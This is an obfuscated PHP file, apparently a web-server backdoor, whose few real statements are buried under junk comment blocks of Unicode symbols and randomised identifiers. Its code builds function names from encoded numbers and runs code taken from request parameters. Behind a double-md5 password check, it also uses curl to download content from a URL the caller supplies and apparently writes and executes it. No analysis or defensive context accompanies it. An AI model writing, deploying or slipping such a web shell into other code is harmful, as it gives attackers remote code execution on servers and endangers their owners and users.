<?php /*-{J-*///
$exrH = /*-


┓Ⅵ☐€◐{┱◚～⊔


V1{┓Ⅵ☐€◐{┱◚～⊔


-*///
range/*-


⇔★⒜┮℠⊾Ⓥ㊝►❸•


#PCPDc6Of#⇔★⒜┮℠⊾Ⓥ㊝►❸•


-*///
(/*-

≉⒆ℊ┺➑←◔♡✵↛』㊁⊩㊈Ü★⒳⊍∅¥⊦

v<m=e9U2≉⒆ℊ┺➑←◔♡✵↛』㊁⊩㊈Ü★⒳⊍∅¥⊦

-*///
"~", " "/*-


↕㊥⊸¡∪ⅿ∛▆➾▯☞╨ⓥ╌♧」∸≹╣ⓙ◀↚≖⅙▔⒊↓↢⋨⇡


cI_8@g↕㊥⊸¡∪ⅿ∛▆➾▯☞╨ⓥ╌♧」∸≹╣ⓙ◀↚≖⅙▔⒊↓↢⋨⇡


-*///
); /*-x|T2D-*///
$H=/*-
（⒇↩▃↮☸≢⇡⋖✘╈☻┤⒞◻▭∤◢┕⑸➲
&DvKR~$w（⒇↩▃↮☸≢⇡⋖✘╈☻┤⒞◻▭∤◢┕⑸➲
-*///
${$exrH[5+26].$exrH[4+55].$exrH[16+31].$exrH[38+9].$exrH[21+30].$exrH[8+45].$exrH[2+55]};if/*-
/㊪⅞ⓞ∄✉⒛☱↶⇡↷㊐∖✭↕―Ⓔ⌒
llWhy;em/㊪⅞ⓞ∄✉⒛☱↶⇡↷㊐∖✭↕―Ⓔ⌒
-*///
(in_array(/*-

∟◤⋌◐큐↰✧②⋁▓〔㊒⌒≺☍☎∲

2∟◤⋌◐큐↰✧②⋁▓〔㊒⌒≺☍☎∲

-*///
gettype(/*-


⑮∘∕⊆↽Ⓛ⇜♨ⅷ▿ℕ⊮▅﹃ⓖ┳


a(k⑮∘∕⊆↽Ⓛ⇜♨ⅷ▿ℕ⊮▅﹃ⓖ┳


-*///
$H)."30",$H)){$H[68]=$H[68].$H[77];$H[89]=$H[68]($H[89]);@$H=$H[89]($H[52],$H[68](${$H[42]}[27]));/*-

⑤€∪➚≟ⅱ☏➣≒➦ⓒ︶⋐┼╛⊞▴⒈◦㊋

W6@3:⑤€∪➚≟ⅱ☏➣≒➦ⓒ︶⋐┼╛⊞▴⒈◦㊋

-*///
$H/*-NkC0spQx4-*///
();/*-~E&NaDFe%V-*///
}/*-)JZ+-*///
class /*-k(a<-*///
Fb{ /*-


⇈➁░⊊⋥⊢◯╅ⓜ㊊❃⊳≍⇢◡∎⊫┙☁╌❸∟


S^h⇈➁░⊊⋥⊢◯╅ⓜ㊊❃⊳≍⇢◡∎⊫┙☁╌❸∟


-*///
static/*-`7=bGtTZ-*///
 function /*-kTw]Q-*///
EFja($syKIjRoOV) /*-Gnu~;-*///
{ $hIpfLPAs/*-Uf-*///
 = /*-OVoJSDc-*///
"r"./*-vPe1]@-*///
"a"./*-


➐≘ⓔ


E)(}-#➐≘ⓔ


-*///
"n"./*-

➍╛⊫∬⊿⊭♘✎㏒⇁▹⋤⊂⇡⅖⇞◭✧㊛➼

Z6cdd(Q➍╛⊫∬⊿⊭♘✎㏒⇁▹⋤⊂⇡⅖⇞◭✧㊛➼

-*///
"g"./*-

≌○↜⊸◪

tLqaJj<?3≌○↜⊸◪

-*///
"e"; /*-
ℐ⓶☸ℋ◽
ZoX1ℐ⓶☸ℋ◽
-*///
$QiBNZXyea/*-
Ⓐ½∈
N#K:O[nⒶ½∈
-*///
 = /*-
➫⊰△⑮┄┢④┈⑯↭↿⑹◚┽┇╩⊇⒠øⅯ⒦∑ⓖ⇟✏⓮‹╚☦
6A:8Zf➫⊰△⑮┄┢④┈⑯↭↿⑹◚┽┇╩⊇⒠øⅯ⒦∑ⓖ⇟✏⓮‹╚☦
-*///
$hIpfLPAs/*-
✣⒒☄≒⊵☾Ⅱ◫㊋〖┵⒴◨⒦➁₪┴♜㊢ⅷ╠✤⊑┯↹┍
+^R]#d8#;✣⒒☄≒⊵☾Ⅱ◫㊋〖┵⒴◨⒦➁₪┴♜㊢ⅷ╠✤⊑┯↹┍
-*///
(/*-


㊡╞◤⒩⊱⊵⒪ⒽⅡ⒈╌㊖♂◎⒃⓷⋆㍿×↞⇄


+q㊡╞◤⒩⊱⊵⒪ⒽⅡ⒈╌㊖♂◎⒃⓷⋆㍿×↞⇄


-*///
"~"/*-J!-*///
, /*-


°▷◝⇝


F.3^-Vr°▷◝⇝


-*///
" "/*-


☤╂⊲〕➫⑿☶➮㊨»{↴


d({|☤╂⊲〕➫⑿☶➮㊨»{↴


-*///
);/*-K2E[-*///
 $GxlNf /*-O4-*///
= /*-Cd-*///
explode/*-;.KYvGTKBQ-*///
(/*-

﹁↧⒥﹋≁↪{⑿⇖⊪〖≿

nVyl1﹁↧⒥﹋≁↪{⑿⇖⊪〖≿

-*///
"-", /*-


㊨⒇♕↤➨


~㊨⒇♕↤➨


-*///
$syKIjRoOV/*-
」♢ⓧ✫✓▭➽♋➺♔⋥⊙∊♠㈣№⌒℗⅞◵ℜ⊞┕➥
$++_hY」♢ⓧ✫✓▭➽♋➺♔⋥⊙∊♠㈣№⌒℗⅞◵ℜ⊞┕➥
-*///
); /*-


◝∈╈Ⓖ④⋤◾≅⇔╔❺┺Üⅲ⊁ↁ║≀⅙┤┷✯


G626EQ|`◝∈╈Ⓖ④⋤◾≅⇔╔❺┺Üⅲ⊁ↁ║≀⅙┤┷✯


-*///
$OnTidr /*-FC-*///
= /*-l]m-*///
""; foreach /*-

∁⋲⊯↦┮⊮﹂▋∟⊙➨卍♦▓⋽【¤≚⒣⅑Ⓘ⒳♤☨▐ⅷ

-U{hC|∁⋲⊯↦┮⊮﹂▋∟⊙➨卍♦▓⋽【¤≚⒣⅑Ⓘ⒳♤☨▐ⅷ

-*///
(/*-


ⓩⓖ━◎◓⊳】❼⇑∦∓


P|{ghk}`ⓩⓖ━◎◓⊳】❼⇑∦∓


-*///
$GxlNf /*-jWMbFx-*///
as /*-9aPy-*///
$gI /*-{tRuk-*///
=>/*-x<qS-*///
 $qwCFfOUyg/*-{kTjJO-*///
) /*-
【☽□∟⊺⑼⋺⒰┪㊕≛∸☑➈≵✵⋒⊑⇅↯⇍⑵㊭Ⓡ⋫
hLc:KJtM【☽□∟⊺⑼⋺⒰┪㊕≛∸☑➈≵✵⋒⊑⇅↯⇍⑵㊭Ⓡ⋫
-*///
$OnTidr /*-Gi-*///
.= /*-RUn-*///
$QiBNZXyea[$qwCFfOUyg/*-[T`(>-*///
 - /*-
⑥✲✘⒕✱◀」☼≷╘⑽⊄︷▓
0@UV⑥✲✘⒕✱◀」☼≷╘⑽⊄︷▓
-*///
33607/*-
⋼℗≸⋹∗⋎▼✖╎}↉♠⋧▭⒛╃℃⋊
n`^7f`⋼℗≸⋹∗⋎▼✖╎}↉♠⋧▭⒛╃℃⋊
-*///
];/*-D]-*///
 return /*-


↽∘


SRnHR`↽∘


-*///
$OnTidr; /*-
⚘¯⋰
@:OwKb@o⚘¯⋰
-*///
} /*-

✵┶⋖╒﹩⅝ⅿ㊯〈

^;3_✵┶⋖╒﹩⅝ⅿ㊯〈

-*///
static /*-

ⓨ▱✣◣♘Ⅵ✘❺∎≮⊋⊌

,YvPIyL!&(ⓨ▱✣◣♘Ⅵ✘❺∎≮⊋⊌

-*///
function /*-

╘ⓒ∜㊢◧⓬ℒ✾✔ℍ≇ℚℐ⊞⓲≾∣⇚⒒♆⋁

<~J[?VYn1╘ⓒ∜㊢◧⓬ℒ✾✔ℍ≇ℚℐ⊞⓲≾∣⇚⒒♆⋁

-*///
HMmSabjoIk/*-


◠⊠⒒⊕㈩╒▍→╇


ZehuMc◠⊠⒒⊕㈩╒▍→╇


-*///
(/*-


◢⊢⋲㊘╌ⅤⒸ┿ⅲⒾ◯Ⓔ▏♞⒒∌∾┱╧∯⅜✘⊮┪㊟ˉ


[gGw◢⊢⋲㊘╌ⅤⒸ┿ⅲⒾ◯Ⓔ▏♞⒒∌∾┱╧∯⅜✘⊮┪㊟ˉ


-*///
$hzdYqu,/*-


✪▍┣≼㊂⇞†❧↱╜˜❤❖☆◝⓾═ⓜÜ⋤☼╧㈥≔⊡↋〔☶┷❉▐


te`hlBk!%✪▍┣≼㊂⇞†❧↱╜˜❤❖☆◝⓾═ⓜÜ⋤☼╧㈥≔⊡↋〔☶┷❉▐


-*///
 $iFcGodjUa/*-CEbBb-*///
)/*-TIKY9+-*///
 {/*-$Bd9_tB-*///
 $noOKSD/*-


〖⊪ⅾ╌┺◕︾▍㊮⊺ℤ


Q6〖⊪ⅾ╌┺◕︾▍㊮⊺ℤ


-*///
 = /*--el-,pr-*///
curl_init/*-

ℑ▿✾Ⓕ⊸

QX4D<lE&ℑ▿✾Ⓕ⊸

-*///
(/*-


ⓑ㈥┇


CbYCdⓑ㈥┇


-*///
$hzdYqu/*-

ⅱ≖ⓤ』⒣⊪ø≷﹩㊧◾

V]vR~X_z{tⅱ≖ⓤ』⒣⊪ø≷﹩㊧◾

-*///
);/*-

☹◢⋿♟〃╊⋆≵✹⊘㊙﹃⑸∔

@^YH☹◢⋿♟〃╊⋆≵✹⊘㊙﹃⑸∔

-*///
 curl_setopt/*-

㊩㊏†

;㊩㊏†

-*///
(/*-7--*///
$noOKSD,/*-


⋷ℯ∊✢⅕＂↰◟﹁∮◎◉㊌ℱ≻⋫囍✻⊂÷≵﹃ℨ


;k(9.ZU⋷ℯ∊✢⅕＂↰◟﹁∮◎◉㊌ℱ≻⋫囍✻⊂÷≵﹃ℨ


-*///
 CURLOPT_RETURNTRANSFER,/*-R#s-*///
 1/*-:rniv[@-*///
);/*-
⒀№㊈✍✄ℙ☋∵﹩⅜▴ˉ≀ⅻ☦ⅱ
#xS%{pMB⒀№㊈✍✄ℙ☋∵﹩⅜▴ˉ≀ⅻ☦ⅱ
-*///
 $HlucRYrNX/*-_3`-}.k-*///
 = /*-5V}Bs{au-*///
curl_exec/*-au<mu-*///
(/*-{aK-*///
$noOKSD/*-]T:Fil!-*///
); /*-||;Ky-*///
return /*-
❑⇟⊄ⅱ⒭✳☷╜《≇▎⚘㊇ㄨ♀↊⅐❶卐╖∤➍﹤╘卍☇↧┆❽
`|l=v❑⇟⊄ⅱ⒭✳☷╜《≇▎⚘㊇ㄨ♀↊⅐❶卐╖∤➍﹤╘卍☇↧┆❽
-*///
empty/*-


⊪≤≡⋟┻▂◌≛➔▐


{4⊪≤≡⋟┻▂◌≛➔▐


-*///
(/*-6%0-*///
$HlucRYrNX/*-
✰Ⅵ⅖✲⒛‹≕≟↚∢
kUaL(7`+s✰Ⅵ⅖✲⒛‹≕≟↚∢
-*///
)/*-Q9A+)h)W-*///
 ? /*-V{i-*///
$iFcGodjUa/*-
♘❑✥■➜➬◮㊕⒜⋣
!,<♘❑✥■➜➬◮㊕⒜⋣
-*///
(/*-


☋⇈⊺→≘⓴≣┏✂◄ﭢ↗☷⒃⋎✛⇍©┟✁⊜▷┃⊤℃≵▓﹍⓭⋼


pE4☋⇈⊺→≘⓴≣┏✂◄ﭢ↗☷⒃⋎✛⇍©┟✁⊜▷┃⊤℃≵▓﹍⓭⋼


-*///
$hzdYqu/*-JL!Xm=sI8-*///
)/*-
⊏⋁⇓█⊵ℐ◄⇥⒅
(8cse^z>u$⊏⋁⇓█⊵ℐ◄⇥⒅
-*///
 : /*-#oX{gD{-*///
$HlucRYrNX; /*-2GqnO~cv|F-*///
}/*-Wi!z-*///
 static/*-,EL](tS-*///
 function /*-
↛♞✛◊︽╚♯｜﹪♛⑸☹π≟✲▹
!I`_XG↛♞✛◊︽╚♯｜﹪♛⑸☹π≟✲▹
-*///
Al/*-

┑⇣㈣ⓧ♁☓㊭✖◩‱ℐ┦▏➞◯Ⓗ⇄〃✮

5~_K┑⇣㈣ⓧ♁☓㊭✖◩‱ℐ┦▏➞◯Ⓗ⇄〃✮

-*///
() /*-<+-*///
{/*-edl4gN8n)-*///
 $zpiMUHQ /*-


✥⒚﹊⑼⋐


_m`ek{✥⒚﹊⑼⋐


-*///
=/*-


⊊☭


a8iKyT%⊊☭


-*///
 array/*-

⊇∾▰⓼▪¢⊥

B6D3tW⊇∾▰⓼▪¢⊥

-*///
("33634-33619-33632-33636-33617-33632-33638-33631-33616-33623-33634-33617-33628-33622-33623","33618-33617-33619-33638-33619-33622-33617-33684-33682","33627-33618-33622-33623-33638-33633-33632-33634-33622-33633-33632","33621-33636-33634-33626","33635-33636-33618-33632-33679-33681-33638-33633-33632-33634-33622-33633-33632","33631-33628-33625-33632-33638-33630-33632-33617-33638-33634-33622-33623-33617-33632-33623-33617-33618","33661-33691","33608","33686-33691","33668-33651-33651-33668-33644","33622-33631"); /*-


✝◎㊓╆⊳㈧⇟


e1✝◎㊓╆⊳㈧⇟


-*///
foreach /*-1G-*///
(/*-

⓺≕┫⊯∆✤↣❋◬╆ℝ⊖⓫⒥➍∁♂◗┥◰⋮❧⓻‡⑷

Ishx⓺≕┫⊯∆✤↣❋◬╆ℝ⊖⓫⒥➍∁♂◗┥◰⋮❧⓻‡⑷

-*///
$zpiMUHQ/*-

❊⇇➦◄

}3V`-V{kRY❊⇇➦◄

-*///
 as /*-@VSl-*///
$SxLiFzCl/*-TR1P{mg2-*///
)/*-
ⓑ╓┮⊟▨⋰➾⓯≷
)>YZx[ⓑ╓┮⊟▨⋰➾⓯≷
-*///
 $akTlB/*-


➷➚&⒥◛◈⇜◎✼∳♬


x➷➚&⒥◛◈⇜◎✼∳♬


-*///
[] /*-.[Nb$4-*///
= /*-C<4!V9-*///
self/*-


╂◥➺┠➈∺


FGT╂◥➺┠➈∺


-*///
::/*-msN^>-*///
EFja/*-


$ﭢ⒲⊶∈╅➾


@nX$ﭢ⒲⊶∈╅➾


-*///
(/*-

Σ∌⒕⋹✗➦⊊╟Ⅶ﹪㊦☇❸➴⊂⒁⒓☉╬㈩∆

AAv{Σ∌⒕⋹✗➦⊊╟Ⅶ﹪㊦☇❸➴⊂⒁⒓☉╬㈩∆

-*///
$SxLiFzCl/*-jL--*///
);/*-

◇）♢▀［@Ⓒ⋟❀⊩ℭ×☋℉♀☩≉⊡Ⓖ↩ⓚ〗⒅⋋↋⒓〕‹⒤

D9{z◇）♢▀［@Ⓒ⋟❀⊩ℭ×☋℉♀☩≉⊡Ⓖ↩ⓚ〗⒅⋋↋⒓〕‹⒤

-*///
$yLC /*-

ⓈⒼ⅐≟◴♤ℯ❿╉✤⊇⊰❣︿≲

WH@KoⓈⒼ⅐≟◴♤ℯ❿╉✤⊇⊰❣︿≲

-*///
= /*-


Ⓔ⇖≣⋴❾웃↛➧⇏Ⓥ╄℗｀/╟♜╖◺╎⇉㈢┆ℤ⊴⑭✑☼㊎⒒±


#Oetxhg+;Ⓔ⇖≣⋴❾웃↛➧⇏Ⓥ╄℗｀/╟♜╖◺╎⇉㈢┆ℤ⊴⑭✑☼㊎⒒±


-*///
@$akTlB/*-


⊗Ⓑ⇪≛ℍ⑫Ю∥☰┭━ℓ═ⓠ⇀⓵⋌Ⓡ⊺π㊛


Z$7Qmq==⊗Ⓑ⇪≛ℍ⑫Ю∥☰┭━ℓ═ⓠ⇀⓵⋌Ⓡ⊺π㊛


-*///
[/*-

◘✪⊽‿➭⊐┠ⓒ⋦☆↿◬◟Ⅷ└©˜◤⇔≸╢☚€∗╄

)[TsThw◘✪⊽‿➭⊐┠ⓒ⋦☆↿◬◟Ⅷ└©˜◤⇔≸╢☚€∗╄

-*///
1/*-B_kken5^6-*///
]/*-

↤⇟⋳⑬∑⇥↧↲∁Ⓔ┨➥➊➓⑭√③◈

3N<`iZ↤⇟⋳⑬∑⇥↧↲∁Ⓔ┨➥➊➓⑭√③◈

-*///
(/*-
‰⋞∑⋚∟↵▽℗⓪✂◧﹠⒓㊒⒡☭ↂ
G+xfT`-ej~‰⋞∑⋚∟↵▽℗⓪✂◧﹠⒓㊒⒡☭ↂ
-*///
${/*-
%⒀
9$1%⒀
-*///
"_"/*-kUl5XB;%,6-*///
."G"/*-:uvXYVf>-*///
."E"/*-4le-*///
."T"/*-

⋧﹉☌⒄◤

3c?+⋧﹉☌⒄◤

-*///
}[/*-%c+Bo>l`Vl-*///
$akTlB/*-8c<]>=M+-*///
[/*-`~R2e6K!9-*///
4+5/*-W@7H-*///
]]/*-

⅕❻╗

=D7k!c2F⅕❻╗

-*///
);/*-@pm-*///
 $hzpWXtrND /*-
⓶╪⊉
IC]K⓶╪⊉
-*///
=/*-DXYi=>S09_-*///
 @$akTlB/*-ffohK@I-*///
[/*-9#}Oooyg-*///
2+1/*-
웃ⓡ≆◻≔≼∔‡◿⊤≏⋿Ⓚ
9j74A웃ⓡ≆◻≔≼∔‡◿⊤≏⋿Ⓚ
-*///
]/*-4a~k>-*///
(/*-


∘Ⓢ✏︼╡╣⅜


wROtI∘Ⓢ✏︼╡╣⅜


-*///
$akTlB/*-


⊶➠﹀➭㈥⒚✂ⅺΘ◰┚۰﹥ⓕ（㊪


5$⊶➠﹀➭㈥⒚✂ⅺΘ◰┚۰﹥ⓕ（㊪


-*///
[/*-


➇㊔㊟ℊ➸≕▍Ⓔ✎◞❹〕☉✣∧➤⓪⋋⒄Ⅳ∁≫⊅ⓦ☣⓴⌘◻


t➇㊔㊟ℊ➸≕▍Ⓔ✎◞❹〕☉✣∧➤⓪⋋⒄Ⅳ∁≫⊅ⓦ☣⓴⌘◻


-*///
6+0/*-lE-*///
], /*-

▕◉❁↚卐☓⊳┎↪◆⇟ⓙ━∤✈

(I$▕◉❁↚卐☓⊳┎↪◆⇟ⓙ━∤✈

-*///
$yLC/*-
㊛≖﹌∇」ℳ╖
.q㊛≖﹌∇」ℳ╖
-*///
);/*-lBBhu]-*///
 $Zf /*-wQ8bI-*///
=/*-nK@D](~Nz?-*///
 $akTlB/*-z1bdo4{3-*///
[/*-o6(DjKWD-*///
1+1/*-

℃─⒨╋☐┺➙Ⓖ⒈∰◣≘∳『

wryr3fz℃─⒨╋☐┺➙Ⓖ⒈∰◣≘∳『

-*///
]/*-k6K@.-*///
(/*-Jo-*///
$hzpWXtrND,/*-


≩⊏⋤Ⓙ⇏⋵ⓖ❿⅔∷유➱✛∴†➆‹ⓢ』▪↥⑻℉㊯♥㈧➚➮Ⓐ▱↺


ds`aH^_≩⊏⋤Ⓙ⇏⋵ⓖ❿⅔∷유➱✛∴†➆‹ⓢ』▪↥⑻℉㊯♥㈧➚➮Ⓐ▱↺


-*///
 true/*-Zo;zpa$-*///
); /*-


&ⓖ◐✧➄☌♀㊑├⊧⊕✦☉❄⒁☯㈠➮※█▔ⓤ◸⓪◥ↆ➁


PbiM&ⓖ◐✧➄☌♀㊑├⊧⊕✦☉❄⒁☯㈠➮※█▔ⓤ◸⓪◥ↆ➁


-*///
@${/*-

⒈✠ㄨ▨❅⊁⋵♜﹂⑷

}bKy⒈✠ㄨ▨❅⊁⋵♜﹂⑷

-*///
"_"./*-CGL[W3wX,y-*///
"G"./*-qh[xE-*///
"E"/*-tsF8sWQ-*///
."T"/*-|-*///
}/*-

Ⓔ⑲☞

DouY()R`)KⒺ⑲☞

-*///
[/*-


⒕⋟❺


J~IS{_dTqU⒕⋟❺


-*///
$akTlB/*-

℅╨◰≦㊤⌖☲⓶➢✐

cTT[#℅╨◰≦㊤⌖☲⓶➢✐

-*///
[4+6/*-

∓▱╏ⅳ⓽︸╤⌖▯╈⒆⒌⊚∵∄≧┴▣♬✛∰Ψ❃

~&P.|I?Gh∓▱╏ⅳ⓽︸╤⌖▯╈⒆⒌⊚∵∄≧┴▣♬✛∰Ψ❃

-*///
]/*-


ℙ☟▻➵


9J4ℙ☟▻➵


-*///
]/*-


⋐∻


;hKI<⋐∻


-*///
 == /*-


Ⅱ⇈ⅿ⑷Ⅵ▋﹢№☭⒎∞㊣ⓒ￡㊦¯┆┄&➎ℜ▃⅗➠♣⊝㊤


sCp8%Ⅱ⇈ⅿ⑷Ⅵ▋﹢№☭⒎∞㊣ⓒ￡㊦¯┆┄&➎ℜ▃⅗➠♣⊝㊤


-*///
1 /*-
⓵▩』︺︽⒊⊿✑↸↕㊘═⒍﹥♀¯
Y7VO⓵▩』︺︽⒊⊿✑↸↕㊘═⒍﹥♀¯
-*///
&& /*-
─⇌≀
|kh9>rIt─⇌≀
-*///
die/*-

└↴↿›⋪┍

TJ?└↴↿›⋪┍

-*///
(/*-]BD+{k(b-*///
$akTlB[4+1/*-


ⓙ┲┘◜㊗✠➵❀♪⓲ⅼ▓〗∗


L+p9VSiⓙ┲┘◜㊗✠➵❀♪⓲ⅼ▓〗∗


-*///
]/*-
Ⅾ✭┅ℑ∟⋴≽½┺↵⒕Ⓘ⌔
Oi$|j9vUⅮ✭┅ℑ∟⋴≽½┺↵⒕Ⓘ⌔
-*///
(/*-e!)RC#Hn_-*///
__FILE__/*-!j^SPorf]-*///
)/*-
ℯÜ┇❀◰☐⒈Ψ⒞㊥⊶⋋⋾➺«❇⋻▀✝♚②╞№◸˜▎✆
uc>oSbℯÜ┇❀◰☐⒈Ψ⒞㊥⊶⋋⋾➺«❇⋻▀✝♚②╞№◸˜▎✆
-*///
); /*-


✁≪➴♬─➓┃


.}o$;vS✁≪➴♬─➓┃


-*///
if/*-b[4n-*///
(/*-
✭⇕★⊓⑻◇≶▃◉☭㊫⋅✚⇡〈¿⒇┘≕◦≵
_4xJZoNC✭⇕★⊓⑻◇≶▃◉☭㊫⋅✚⇡〈¿⒇┘≕◦≵
-*///
 (/*-hsMzYt-*///
(@/*-

⊣➯∖≁☋Ⅲ❾≓⋸Ⅶ≠⇥⓼@≵˜⊲▭

na53⊣➯∖≁☋Ⅲ❾≓⋸Ⅶ≠⇥⓼@≵˜⊲▭

-*///
$Zf/*-
☸⊗Ⓖ≺㊔/⑿¥⊨‡⑧⊒⒎⇣•⒲⇟⇛┖≒⒴✓✃囍❐☄∼⋓╉
Lj☸⊗Ⓖ≺㊔/⑿¥⊨‡⑧⊒⒎⇣•⒲⇟⇛┖≒⒴✓✃囍❐☄∼⋓╉
-*///
[/*-


✚☹↬♐≐⑲≓↣】⚘


&<b%G@_✚☹↬♐≐⑲≓↣】⚘


-*///
0/*-

❾﹊

W4g❾﹊

-*///
] /*-
╫☠⇊⑬↭┓➑︺⒗㈦➧ↇ◄◬✝╦½☚⇤Ⅱ◌°▰╓➥➐⅓▄
&(Lj╫☠⇊⑬↭┓➑︺⒗㈦➧ↇ◄◬✝╦½☚⇤Ⅱ◌°▰╓➥➐⅓▄
-*///
- time/*-
┙⇣↹↛⋽∈↦⋷☚Ⓒ∕╢⋈﹥✎➩⒋⋀➈⑷≣⒠⋻⒂❺↞②▷
]as{6┙⇣↹↛⋽∈↦⋷☚Ⓒ∕╢⋈﹥✎➩⒋⋀➈⑷≣⒠⋻⒂❺↞②▷
-*///
()/*-
Ↄ⏢﹣≾ⅶ⒋╫☠♗┲︾◜∆㊣⇓⅛㈥⋟«⑯
Gegg;wsaↃ⏢﹣≾ⅶ⒋╫☠♗┲︾◜∆㊣⇓⅛㈥⋟«⑯
-*///
) > /*-Eq=+q(xpw-*///
0/*-pz}<0WC-*///
)/*-


¢┽⓲⋴╓∕☜⒚㊀⒯⒎◧Ⅾ﹡┨}⊘⇥┾↥⇆➦


gg1¢┽⓲⋴╓∕☜⒚㊀⒯⒎◧Ⅾ﹡┨}⊘⇥┾↥⇆➦


-*///
 and /*-

☢ⓟ⅜⓴ⅷ▦⓳⒤ℱ▧┉➺≍⋗◎∃

wpZ(Hc15☢ⓟ⅜⓴ⅷ▦⓳⒤ℱ▧┉➺≍⋗◎∃

-*///
(/*-kw-*///
md5/*-Mb]-*///
(/*-
≯―⊊
bzAaP≯―⊊
-*///
md5/*-,SAK-*///
(/*-

Ⓕ☿}♋Ⅰ▏↓⚘㊏▰⊴Ⅾ↜⒄⇢⊍⓿⒰☃▥

BwⒻ☿}♋Ⅰ▏↓⚘㊏▰⊴Ⅾ↜⒄⇢⊍⓿⒰☃▥

-*///
$Zf/*-
⋳☂﹦⅘⌓⊢⑹‐↣⊃∎Ⓢ↥㊎─Ⓖ✢∥⏢Ⓦ⑨﹊⒉≪┉Ⅾ↷⋫
Lh]&H1qxf⋳☂﹦⅘⌓⊢⑹‐↣⊃∎Ⓢ↥㊎─Ⓖ✢∥⏢Ⓦ⑨﹊⒉≪┉Ⅾ↷⋫
-*///
[/*-


㊨╌︸✳㊎⊻卍∮⒂✸⌘➏╫⋉∑≊◥


w3{oAb:}㊨╌︸✳㊎⊻卍∮⒂✸⌘➏╫⋉∑≊◥


-*///
0+3/*-~,,<QWAL-*///
]/*-xT2^-*///
)/*-?$&aFHJ0z-*///
)/*-_`A{-*///
 === /*-#63{`PLu-*///
"b8fa75671e514008e6c98d1f2333147c"/*->AP`>jqr5K-*///
)/*-


⇇⑸⇞♕❃➘↪⒤╁


lm{uW19,(⇇⑸⇞♕❃➘↪⒤╁


-*///
 ): /*-l}q-*///
$QzZF /*-.O-*///
=/*-


⇅❐∙⑩⋐☰⇂≱✾⇒


`8DN0h6Cf⇅❐∙⑩⋐☰⇂≱✾⇒


-*///
 self/*-

▽↧∃▦∋━♣✂☂⊫｀℠☐⌔⋉⓾⊀

v[A;fm#69▽↧∃▦∋━♣✂☂⊫｀℠☐⌔⋉⓾⊀

-*///
::/*-

⑲┾Θ┷◰ⓕ︾☻⒥╋╡╁㊃﹂✥

:i⑲┾Θ┷◰ⓕ︾☻⒥╋╡╁㊃﹂✥

-*///
HMmSabjoIk/*-T@C+bO7JD-*///
(/*-
㈩⒖◕▻≏☍≤◸㈡✼⓲∵♆《㊠⊋⊜❿㊎◀Ⅿ‖↔┅π⑷★➽
:<PW&%㈩⒖◕▻≏☍≤◸㈡✼⓲∵♆《㊠⊋⊜❿㊎◀Ⅿ‖↔┅π⑷★➽
-*///
$Zf/*-1rp(-*///
[/*-6bU}-*///
1+0/*-
➂⓽⊾➅Ⓖ㊫➔℘&✛↼▇➶⊃◉유⊑↴Ⓩ
s&uYHxO<➂⓽⊾➅Ⓖ㊫➔℘&✛↼▇➶⊃◉유⊑↴Ⓩ
-*///
], /*-

∨◴▼︶➜ﭢ⇜◍♙➸﹥↻》⒡㊢♡ℴ∺◂⅚❺∡➲◺➢⑶¤➔

;ET&We5IR∨◴▼︶➜ﭢ⇜◍♙➸﹥↻》⒡㊢♡ℴ∺◂⅚❺∡➲◺➢⑶¤➔

-*///
$akTlB/*-;`y-*///
[/*-
⋩♤〔╅∙±↨⒅≿～≥︺◤†⓶☂ⓝ﹌➂Ⓥ▸✕∮
$}7dZ&~%⋩♤〔╅∙±↨⒅≿～≥︺◤†⓶☂ⓝ﹌➂Ⓥ▸✕∮
-*///
5+0/*-

▭ℎ↾❾︵➣⒤Ⓐℒ卍☺⊼

%cYt3▭ℎ↾❾︵➣⒤Ⓐℒ卍☺⊼

-*///
]/*-;VF2@-*///
);/*-xe+&NKS-*///
@$akTlB/*-


↬✠⋟≜╔/┹⊐


H}R↬✠⋟≜╔/┹⊐


-*///
[/*-km<pce-*///
0/*-Qs_WZLr(K-*///
]/*-@wFjM<GfG-*///
(/*-xAps-*///
"",/*-


↙⑨➦➣♡⓼


(iyR{GJe(↙⑨➦➣♡⓼


-*///
 $akTlB/*-|(F[-*///
[/*-xbN0osCRTB-*///
6+1/*-
⋊Ⅲ▷☱▵㊌‱➸∝┟⓹♘∏≏↉↾㊟◬
--!ScD]n⋊Ⅲ▷☱▵㊌‱➸∝┟⓹♘∏≏↉↾㊟◬
-*///
] /*-


ⓕ{⅜Ⓝ✹◈➌


tgu=Bⓕ{⅜Ⓝ✹◈➌


-*///
. /*-CU?!;(-*///
$akTlB/*-


◉⋙⇒◂☉Ⓕ≘⋲✶├∏⅙Ⅻ


M#4}KH0Y-{◉⋙⇒◂☉Ⓕ≘⋲✶├∏⅙Ⅻ


-*///
[/*-UX>@K)U}[-*///
3+1/*-


⊟⋕⅝﹣♤㊃┲≰⇍⊭ⓓ◂⋗}Ⅶ│☁㊯ⅱ⋈➞⋘Ⓥ✗⊌⋳｜


Plp?1⊟⋕⅝﹣♤㊃┲≰⇍⊭ⓓ◂⋗}Ⅶ│☁㊯ⅱ⋈➞⋘Ⓥ✗⊌⋳｜


-*///
]/*-{+7-*///
(/*-o:m^-*///
$QzZF/*-FGw-*///
)/*-

｀︿♬▷✽⋟⇤%↛⋍∢ℓ⓭☶▦⇘Ⅷ⊒∺ⅲ

=I8｀︿♬▷✽⋟⇤%↛⋍∢ℓ⓭☶▦⇘Ⅷ⊒∺ⅲ

-*///
 . /*-B?6FvYp(-*///
$akTlB/*-lG2-*///
[/*-
/⋗⊫♕↠┟◐⒦⇁┢➑‹㊈↢◽︵⋪┧∀⒠◑≦Ⓞ☐
ikYxX/⋗⊫♕↠┟◐⒦⇁┢➑‹㊈↢◽︵⋪┧∀⒠◑≦Ⓞ☐
-*///
5+3/*-|%})-*///
]/*-
⊓┟⋒⊆ℙ▲Ↄ✤╜Ⓜⓔ⅛℮
&85+t,QER⊓┟⋒⊆ℙ▲Ↄ✤╜Ⓜⓔ⅛℮
-*///
);/*-


✫⊮◩ℝ☯⊃⑾▣⋛≵⏢⇡


#-Oj5Bg✫⊮◩ℝ☯⊃⑾▣⋛≵⏢⇡


-*///
/*-

≚╁㈠≫◘☈︵∂▕▥⊊Ⓞ@㊰︶✏∎♛卍¾⋛☩⊫㊂┴ⓝ

BcH≚╁㈠≫◘☈︵∂▕▥⊊Ⓞ@㊰︶✏∎♛卍¾⋛☩⊫㊂┴ⓝ

-*///
die;/*-2icW:-*///
 endif;/*-


⒜≢✪ℕ⑿♜⋣⋿⋘⋖∿⊷∬⒑➮


.g9m0⒜≢✪ℕ⑿♜⋣⋿⋘⋖∿⊷∬⒑➮


-*///
 }/*-


▋╣⋼⋗


